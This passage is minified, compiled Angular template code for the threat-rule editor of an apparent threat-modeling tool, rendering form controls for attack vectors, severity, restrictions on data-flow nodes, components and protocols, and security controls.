e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PhyElementRest.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function sIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PhyElementRest.Property.ID=n)}),s(9,"\n                  "),ne(10,aIe,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),ne(14,nIe,4,1,"ng-container",16),s(15,"\n              "),ne(16,rIe,7,2,"ng-container",16),s(17,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,5,"general.PropertyName")),C(3),V("value",e.PhyElementRest.Property.ID),C(2),V("ngForOf",i.GetAvailablePhyElementPropertyGroups(e)),C(4),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function cIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function lIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function dIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.SenderInterfaceRestriction.Property,r))}),s(1,"\n                      "),ne(2,cIe,3,3,"ng-container",16),s(3,"\n                      "),ne(4,lIe,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function mIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,dIe,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function uIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.SenderInterfaceRestriction.Property.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.SenderInterfaceRestriction.Property.Value)}}function hIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function fIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.SenderInterfaceRestriction.Property,n.target.value))}),s(3,"\n                  "),ne(4,hIe,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.SenderInterfaceRestriction.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function pIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.SenderInterfaceRestriction.Property.ID=n)}),s(9,"\n                  "),ne(10,mIe,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n              "),ne(17,uIe,4,1,"ng-container",16),s(18,"\n              "),ne(19,fIe,7,2,"ng-container",16),s(20,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.SenderInterfaceRestriction.Property.ID),C(2),V("ngForOf",i.GetAvailableInterfacePropertyGroups(e)),C(5),ct("\n                ",e.PropertyRest.ComparisonType,"\n              "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function _Ie(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function gIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function CIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.ReceiverInterfaceRestriction.Property,r))}),s(1,"\n                      "),ne(2,_Ie,3,3,"ng-container",16),s(3,"\n                      "),ne(4,gIe,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function yIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,CIe,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function bIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.ReceiverInterfaceRestriction.Property.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.ReceiverInterfaceRestriction.Property.Value)}}function MIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function vIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.ReceiverInterfaceRestriction.Property,n.target.value))}),s(3,"\n                  "),ne(4,MIe,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.ReceiverInterfaceRestriction.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function AIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.ReceiverInterfaceRestriction.Property.ID=n)}),s(9,"\n                  "),ne(10,yIe,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n              "),ne(17,bIe,4,1,"ng-container",16),s(18,"\n              "),ne(19,vIe,7,2,"ng-container",16),s(20,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.ReceiverInterfaceRestriction.Property.ID),C(2),V("ngForOf",i.GetAvailableInterfacePropertyGroups(e)),C(5),ct("\n                ",e.PropertyRest.ComparisonType,"\n              "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function TIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n              ",e.IsOR?"OR":"AND","\n            ")}}function EIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n            "),m(2,"mat-form-field",4),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n              "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.NodeNumber=n)}),s(11,"\n                "),ne(12,H8e,2,2,"mat-option",11),s(13,"\n              "),u(),s(14,"\n              "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveDFDNodeRestriction(r))}),oe(16,"translate"),s(17,"\n                "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n              "),u(),s(21,"\n            "),u(),s(22,"\n            "),m(23,"mat-form-field",51),s(24,"\n              "),m(25,"mat-label"),s(26),oe(27,"translate"),u(),s(28,"\n              "),m(29,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(30,"\n                "),ne(31,U8e,3,4,"mat-option",47),s(32,"\n              "),u(),s(33,"\n            "),u(),s(34,"\n            "),s(35,"\n            "),ne(36,Y8e,21,8,"ng-container",16),s(37,"\n            "),s(38,"\n            "),ne(39,Z8e,15,8,"mat-form-field",60),s(40,"\n            "),s(41,"\n            "),ne(42,sIe,18,7,"ng-container",16),s(43,"\n            "),s(44,"\n            "),ne(45,pIe,21,8,"ng-container",16),s(46,"\n            "),s(47,"\n            "),ne(48,AIe,21,8,"ng-container",16),s(49,"\n\n            "),ne(50,TIe,2,1,"button",49),s(51,"\n          "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,16,"general.Element")),C(3),V("ngModel",e.Layer),C(2),V("value",e.NodeNumber),C(2),V("ngForOf",n.GetRuleElements()),C(3),at("matTooltip",re(16,18,"general.Delete")),C(11),ke(re(27,20,"general.Type")),C(3),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(5),V("ngIf",1==e.RestType),C(3),V("ngIf",2==e.RestType),C(3),V("ngIf",3==e.RestType),C(3),V("ngIf",10==e.RestType),C(3),V("ngIf",11==e.RestType),C(2),V("ngIf",!i)}}function DIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"div"),s(3,"\n        "),m(4,"mat-form-field",4),s(5,"\n          "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n          "),m(10,"mat-select",10),he("valueChange",function(n){return be(e),Me(B(2).threatRule.DFDRestriction.Target=n)}),s(11,"\n            "),ne(12,O8e,2,2,"mat-option",11),s(13,"\n          "),u(),s(14,"\n        "),u(),s(15,"\n        "),it(16,"br"),s(17,"\n        "),ne(18,B8e,25,10,"ng-container",45),s(19,"\n        "),m(20,"button",55),he("click",function(){be(e);const n=B(2);return Me(n.threatRule.DFDRestriction.AppliesReverse=!n.threatRule.DFDRestriction.AppliesReverse)}),oe(21,"translate"),s(22,"\n          "),m(23,"mat-icon",56),s(24,"swap_horiz"),u(),s(25,"\n        "),u(),s(26,"\n        "),it(27,"br"),s(28),oe(29,"translate"),m(30,"button",43),he("click",function(){return be(e),Me(B(2).AddDFDNodeRestriction())}),oe(31,"translate"),s(32,"\n          "),m(33,"mat-icon"),s(34,"add"),u(),s(35,"\n        "),u(),s(36,"\n        "),m(37,"span",44),s(38),u(),s(39,"\n        "),m(40,"div"),s(41,"\n          "),ne(42,EIe,52,22,"div",45),s(43,"\n        "),u(),s(44,"\n      "),u(),s(45,"\n    "),u()}if(2&t){const e=B(2);C(7),ke(re(8,13,"general.Target")),C(3),V("value",e.threatRule.DFDRestriction.Target),C(2),V("ngForOf",e.GetRuleElements()),C(6),V("ngForOf",e.threatRule.DFDRestriction.NodeTypes),C(2),at("matTooltip",re(21,15,"pages.config.threatrule.applyReverse")),C(3),Ct("btn-selected-light",!e.theme.IsDarkMode&&e.threatRule.DFDRestriction.AppliesReverse)("btn-selected-dark",e.theme.IsDarkMode&&e.threatRule.DFDRestriction.AppliesReverse),C(5),ct("\n        ",re(29,17,"properties.Restrictions")," \n        "),C(2),at("matTooltip",re(31,19,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.DFDRestriction.NodeRestrictions)}}function xIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                ",re(2,2,i.GetRestrictionTypeName(e)),"\n              ")}}function wIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function IIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function RIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                    "),ne(2,wIe,3,3,"ng-container",16),s(3,"\n                    "),ne(4,IIe,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function SIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,RIe,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function kIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function PIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function OIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                "),ne(4,PIe,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function NIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                "),ne(10,SIe,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n            "),ne(17,kIe,4,1,"ng-container",16),s(18,"\n            "),ne(19,OIe,7,2,"ng-container",16),s(20,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n              ",e.PropertyRest.ComparisonType,"\n            "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function LIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n            ",e.IsOR?"OR":"AND","\n          ")}}function zIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n            "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n            "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n              "),ne(12,xIe,3,4,"mat-option",47),s(13,"\n            "),u(),s(14,"\n            "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveComponentRestriction(r))}),oe(16,"translate"),s(17,"\n              "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n            "),u(),s(21,"\n          "),u(),s(22,"\n          "),s(23,"\n          "),ne(24,NIe,21,8,"ng-container",16),s(25,"\n          "),ne(26,LIe,2,1,"button",49),s(27,"\n        "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,9,"general.Type")),C(3),V("ngModel",e.Layer),C(2),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(3),at("matTooltip",re(16,11,"general.Delete")),C(9),V("ngIf",1==e.RestType),C(2),V("ngIf",!i)}}function WIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"mat-form-field",41),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),it(8,"input",42),s(9,"\n      "),u(),s(10,"\n      "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(B(2).AddComponentRestriction())}),oe(15,"translate"),s(16,"\n        "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n      "),u(),s(20,"\n      "),m(21,"span",44),s(22),u(),s(23,"\n      "),m(24,"div"),s(25,"\n        "),ne(26,zIe,28,13,"div",45),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=B(2);C(5),ke(re(6,8,"properties.ComponentType")),C(3),at("matTooltip",null==e.selectedComponentType?null:e.selectedComponentType.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedComponentType?null:e.selectedComponentType.Name),C(4),ct("\n      ",re(13,10,"properties.Restrictions")," \n      "),C(2),at("matTooltip",re(15,12,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.ComponentRestriction.DetailRestrictions)}}function FIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                ",re(2,2,i.GetRestrictionTypeName(e)),"\n              ")}}function VIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function BIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function HIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                    "),ne(2,VIe,3,3,"ng-container",16),s(3,"\n                    "),ne(4,BIe,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function UIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,HIe,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function qIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function GIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function jIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                "),ne(4,GIe,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function QIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                "),ne(10,UIe,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n            "),ne(17,qIe,4,1,"ng-container",16),s(18,"\n            "),ne(19,jIe,7,2,"ng-container",16),s(20,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n              ",e.PropertyRest.ComparisonType,"\n            "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function $Ie(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n            ",e.IsOR?"OR":"AND","\n          ")}}function KIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n            "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n            "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n              "),ne(12,FIe,3,4,"mat-option",47),s(13,"\n            "),u(),s(14,"\n            "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveProtocolRestriction(r))}),oe(16,"translate"),s(17,"\n              "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n            "),u(),s(21,"\n          "),u(),s(22,"\n          "),s(23,"\n          "),ne(24,QIe,21,8,"ng-container",16),s(25,"\n          \n          "),ne(26,$Ie,2,1,"button",49),s(27,"\n        "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,9,"general.Type")),C(3),V("ngModel",e.Layer),C(2),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(3),at("matTooltip",re(16,11,"general.Delete")),C(9),V("ngIf",1==e.RestType),C(2),V("ngIf",!i)}}function XIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"mat-form-field",41),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),it(8,"input",42),s(9,"\n      "),u(),s(10,"\n      "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(B(2).AddProtocolRestriction())}),oe(15,"translate"),s(16,"\n        "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n      "),u(),s(20,"\n      "),m(21,"span",44),s(22),u(),s(23,"\n      "),m(24,"div"),s(25,"\n        "),ne(26,KIe,28,13,"div",45),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=B(2);C(5),ke(re(6,8,"general.Protocol")),C(3),at("matTooltip",null==e.selectedProtocol?null:e.selectedProtocol.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedProtocol?null:e.selectedProtocol.Name),C(4),ct("\n      ",re(13,10,"properties.Restrictions")," \n      "),C(2),at("matTooltip",re(15,12,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.ProtocolRestriction.DetailRestrictions)}}function YIe(t,a){if(1&t){const e=Ye();m(0,"button",23),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddExistingControl(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function JIe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",61),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedControl=r)}),s(1,"\n            "),m(2,"mat-icon",62),s(3,"arrow_right"),u(),s(4,"\n            "),m(5,"div",63),s(6),oe(7,"translate"),u(),s(8,"\n            "),m(9,"button",64),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveControl(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n            "),m(14,"button",65),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteControl(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,8,e.Name)),C(3),at("matTooltip",re(10,10,"general.Remove")),C(5),at("matTooltip",re(15,12,"general.Delete"))}}function ZIe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",67),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedControl=r)}),s(1,"\n              "),m(2,"mat-icon",62),s(3,"security"),u(),s(4,"\n              "),m(5,"div",63),s(6),oe(7,"translate"),u(),s(8,"\n            "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,6,e.Name))}}function e5e(t,a){if(1&t&&(bt(0),s(1,"\n            "),it(2,"mat-divider"),s(3,"\n            "),m(4,"div",20),s(5),oe(6,"translate"),u(),s(7,"\n            "),ne(8,ZIe,9,8,"mat-list-item",66),s(9,"\n          "),Mt()),2&t){const e=B(2);C(5),za("",e.threatRule.AttackVector.Name," ",re(6,3,"general.Controls"),""),C(3),V("ngForOf",e.GetVectorControls())}}function t5e(t,a){if(1&t&&(m(0,"div",68),s(1,"\n          "),it(2,"app-control",69),s(3,"\n        "),u()),2&t){const e=B(2);C(2),V("control",e.selectedControl)("canEdit",!1)("canEditName",!0)("canEditGroup",!0)}}const i5e=function(){return[1,2]};function a5e(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-checkbox",2),he("ngModelChange",function(n){return be(e),Me(B().threatRule.IsActive=n)}),s(3),oe(4,"translate"),u(),s(5,"\n  "),it(6,"br"),s(7,"\n  "),ne(8,i8e,10,6,"mat-form-field",3),s(9,"\n  "),m(10,"div"),s(11,"\n    "),m(12,"mat-form-field",4),s(13,"\n      "),m(14,"mat-label"),s(15),oe(16,"translate"),u(),s(17,"\n      "),m(18,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().threatRule.AttackVector=n)})("selectionChange",function(n){return be(e),Me(B().OnAttackVectorChanged(n.value))}),s(19,"\n        "),m(20,"mat-option"),s(21),oe(22,"translate"),u(),s(23,"\n        "),ne(24,n8e,4,2,"mat-optgroup",6),s(25,"\n      "),u(),s(26,"\n      "),m(27,"button",7),he("click",function(n){return be(e),B().EditAttackVector(),Me(n.stopPropagation())}),oe(28,"translate"),s(29,"\n        "),m(30,"mat-icon"),s(31,"edit"),u(),s(32,"\n      "),u(),s(33,"\n      "),m(34,"button",8),he("click",function(n){return be(e),B().AddAttackVector(),Me(n.stopPropagation())}),oe(35,"translate"),s(36,"\n        "),m(37,"mat-icon"),s(38,"add"),u(),s(39,"\n      "),u(),s(40,"\n    "),u(),s(41,"\n    "),m(42,"mat-form-field",9),s(43,"\n      "),m(44,"mat-label"),s(45),oe(46,"translate"),u(),s(47,"\n      "),m(48,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().threatRule.Severity=n)}),s(49,"\n        "),m(50,"mat-option"),s(51),oe(52,"translate"),u(),s(53,"\n        "),ne(54,o8e,3,4,"mat-option",11),s(55,"\n      "),u(),s(56,"\n    "),u(),s(57,"\n    "),ne(58,s8e,20,4,"mat-accordion",12),s(59,"\n    "),m(60,"mat-form-field",13),s(61,"\n      "),m(62,"mat-label"),s(63),oe(64,"translate"),u(),s(65,"\n        "),m(66,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().threatRule.ThreatCategories=n)}),s(67,"\n          "),ne(68,l8e,4,2,"mat-optgroup",6),s(69,"\n        "),u(),s(70,"\n    "),u(),s(71,"\n    "),m(72,"mat-form-field",13),s(73,"\n      "),m(74,"mat-label"),s(75),oe(76,"translate"),u(),s(77,"\n      "),m(78,"textarea",15),he("ngModelChange",function(n){return be(e),Me(B().threatRule.Description=n)}),u(),s(79,"\n    "),u(),s(80,"\n    "),ne(81,m8e,16,5,"ng-container",16),s(82,"\n    "),m(83,"mat-form-field",4),s(84,"\n      "),m(85,"mat-label"),s(86),oe(87,"translate"),u(),s(88,"\n      "),m(89,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().threatRule.OverridenRules=n)}),s(90,"\n        "),ne(91,h8e,4,2,"mat-optgroup",6),s(92,"\n      "),u(),s(93,"\n    